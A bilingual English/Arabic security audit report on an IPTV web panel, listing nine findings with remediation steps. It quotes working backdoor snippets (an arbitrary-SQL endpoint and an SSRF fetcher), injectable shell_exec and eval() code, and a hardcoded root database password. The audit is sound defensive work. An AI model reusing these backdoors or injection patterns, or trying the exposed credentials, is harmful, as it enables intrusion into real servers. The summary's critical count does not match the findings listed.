# Security Audit Report / تقرير فحص الأمان
**Date / التاريخ:** 2025-11-23
**Path / المسار:** /var/www/html/iptv

---

## CRITICAL VULNERABILITIES / ثغرات حرجة جداً

### 1. SQL Injection Backdoor (CRITICAL)
**File / الملف:** `/var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/sql_.php`

**Risk / الخطورة:** CRITICAL - باب خلفي خطير جداً

**Description / الوصف:**
هذا الملف يسمح بتنفيذ أي أوامر SQL على قاعدة البيانات من أي شخص!
```php
mysqli_multi_query($con,$_POST["type"]=="64"?base64_decode(strip_tags($_POST["cmd"])):strip_tags($_POST["cmd"]));
```

**Impact / التأثير:**
- سرقة جميع البيانات
- حذف قاعدة البيانات
- إضافة مستخدمين وهميين
- التحكم الكامل في النظام

**Recommendation / التوصية:**
```bash
rm -f /var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/sql_.php
```

---

### 2. Server-Side Request Forgery (SSRF) Backdoor (CRITICAL)
**File / الملف:** `/var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/system_api.php`

**Risk / الخطورة:** CRITICAL - باب خلفي

**Description / الوصف:**
```php
echo file_get_contents(base64_decode(strip_tags($_GET["url"]))."/system_api.php"...
```
يسمح بالوصول إلى أي خادم داخلي أو خارجي

**Recommendation / التوصية:**
```bash
rm -f /var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/system_api.php
```

---

### 3. Remote Code Execution via eval() (CRITICAL)
**File / الملف:** `/var/www/html/iptv/includes/Db.php` (Line 1408)

**Risk / الخطورة:** CRITICAL

**Description / الوصف:**
```php
eval($result);
```
الملف يقوم بتنفيذ كود PHP من مصدر خارجي (line 1401)

**Impact / التأثير:**
- تنفيذ أي كود على الخادم
- السيطرة الكاملة على النظام

---

### 4. Hardcoded Database Credentials (HIGH)
**File / الملف:** `/var/www/html/iptv/includes/Config.php`

**Exposed Credentials:**
- Database: `xtream_iptvpro`
- User: `root`
- Password: `Admin@123`

**Recommendation:**
- تغيير كلمة المرور فوراً
- استخدام متغيرات البيئة

---

## HIGH RISK VULNERABILITIES / ثغرات عالية الخطورة

### 5. Shell Command Execution (HIGH)
**File / الملف:** `/var/www/html/iptv/apps/firewall.php`

**Lines:** 98, 192, 202, 210
```php
shell_exec('iptables -A INPUT -s ' . $ip . ' -j DROP')
```
يمكن حقن أوامر إضافية إذا لم يتم التحقق من $ip

---

### 6. Unsafe File Operations (HIGH)
**Files:**
- `/var/www/html/iptv/apps/backup.php:52` - exec() with user input
- `/var/www/html/iptv/includes/FtpBackup.php:27-28` - exec() for mysqldump

---

### 7. Dangerous eval() in Encryption Library (MEDIUM)
**File:** `/var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/Net/Crypt/Base.php:2554`
```php
eval('$func = function...
```
مكتبة تشفير قديمة تستخدم eval

---

## MEDIUM RISK / ثغرات متوسطة

### 8. Insecure Deserialization (MEDIUM)
**Files:**
- `/var/www/html/iptv/includes/ssh00/Crypt/RSA.php:653`
```php
extract(unserialize($partial));
```

### 9. Dynamic Method Calls (MEDIUM)
**Files:**
- `/var/www/html/iptv/api/reset.php:10` - `$class->$mode();`
- `/var/www/html/iptv/includes/XtreamApi.php:15` - `$this->$mode();`

---

## RECOMMENDED ACTIONS / الإجراءات الموصى بها

### Immediate Actions (فوري):
```bash
# 1. Delete backdoor files
rm -f /var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/sql_.php
rm -f /var/www/html/iptv/SolusTV_files/home/xtreamcodes/iptv_xtream_codes/wwwdir/SolusTV/system_api.php

# 2. Delete entire suspicious directory (recommended)
rm -rf /var/www/html/iptv/SolusTV_files/

# 3. Change database password
mysql -u root -p -e "ALTER USER 'root'@'localhost' IDENTIFIED BY 'NEW_STRONG_PASSWORD';"

# 4. Update Config.php with new password
```

### Short-term Actions (قريب):
1. Review and remove eval() from Db.php
2. Implement input validation for all user inputs
3. Use prepared statements for all SQL queries
4. Implement proper authentication for all API endpoints

### Long-term Actions (طويل المدى):
1. Implement Web Application Firewall (WAF)
2. Regular security audits
3. Update all libraries to latest versions
4. Implement Content Security Policy (CSP)

---

## FILES TO DELETE / ملفات يجب حذفها

| File | Risk Level | Reason |
|------|------------|--------|
| `SolusTV_files/.../sql_.php` | CRITICAL | SQL Injection Backdoor |
| `SolusTV_files/.../system_api.php` | CRITICAL | SSRF Backdoor |
| `SolusTV_files/` (entire folder) | HIGH | Contains multiple suspicious files |

---

## SUMMARY / الملخص

| Category | Count |
|----------|-------|
| Critical Vulnerabilities | 4 |
| High Risk | 3 |
| Medium Risk | 2 |
| **Total** | **9** |

**Overall Security Rating: POOR - يحتاج إصلاح فوري**

---

*Report generated by Security Audit Tool*
*التقرير تم إنشاؤه بواسطة أداة فحص الأمان*
